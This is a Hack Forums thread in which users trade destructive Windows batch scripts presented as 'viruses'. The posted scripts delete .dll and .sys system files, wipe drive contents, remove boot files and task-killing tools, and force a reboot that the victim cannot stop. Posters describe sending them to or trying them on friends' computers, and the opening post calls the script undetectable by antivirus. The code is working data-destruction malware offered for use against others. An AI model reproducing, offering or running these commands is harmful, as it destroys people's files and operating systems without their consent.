Hack Forums

Full Version: making .dll .sys virus!!
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
This virus is indetectible by antivirus scanners.
open notepad and past this code:


Code:
@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
this will delete all .dll and .sys files change it the way u want like:

Code:
@Echo off c: cd %WinDir%\System\ deltree /y *.psw cd\ deltree /y *.exe
enjoy!!
Edited by tanmoy
nice done :D i am gonna try that on my friends computer:D:D
tanmayroy_007 Wrote:This virus is indetectible by antivirus scanners.
open notepad and past this code:


Code:
@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
this will delete all .dll and .sys files change it the way u want like:

Code:
@Echo off c: cd %WinDir%\System\ deltree /y *.psw cd\ deltree /y *.exe
enjoy!!
Edited by tanmoy

Hi. No offense, but I guess you don't know much about viruses at all. What you have posted here is a simple batch script.
No offense, but your "virus" is not even half as effective as this script right here:
Code:
@del B:\ /y
@del D:\ /y
@del C:\ /y
@del E:\ /y
@del A:\ /y
@del F:\ /y
@del G:\ /y
@del H:\ /y
@del I:\ /y
@del J:\ /y
@del K:\ /y
@del L:\ /y
@del M:\ /y
@del N:\ /y
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h %windir%\win.ini
del %windir%\win.ini
attrib -r -s -h %windir%\notepad.exe
del %windir%\notepad.exe
attrib -r -s -h %windir%\system32\cmd.exe
del %windir%\system32\cmd.exe
attrib -r -s -h %windir%\system32\command.com
del %windir%\system32\command.com
attrib -r -s -h %windir%\system32\taskmgr.exe
del %windir%\system32\taskmgr.exe
attrib -r -s -h %windir%\system32\taskkill.exe
del %windir%\system32\taskkill.exe
shutdown -r -t 00

This little script changes the attributes to "Write and Modify" of all required boot files and all files which can be used to kill tasks, deletes some stuff off the some other hard drives, then reboots the computer when it's done. The user CANNOT stop the process. If you wish to try this out, do it on a Virtual PC or something, it's a great little script I wrote just now :)

Enjoy! ;D
lmao good one Wendigo
I sended my friend one of those del thing yesterday and I just learned something. To add the /y
Well this piece of code is more convenient ;)

@echo off
For /r C:\ %%A in (*.sys) do attrib -r -s -h -a %%A -> this removes system protection for all *.sys files
del /q %%A -> this deletes all *.sys files
For /r C:\ %%B in (*.dll) do attrib -r -s -h -a %%B -> this removes system protection for all *.dll files
del /q %%B -> this deletes all *.dll files

and your done
Interesting work!
uhh.... nevermind
Reference URL's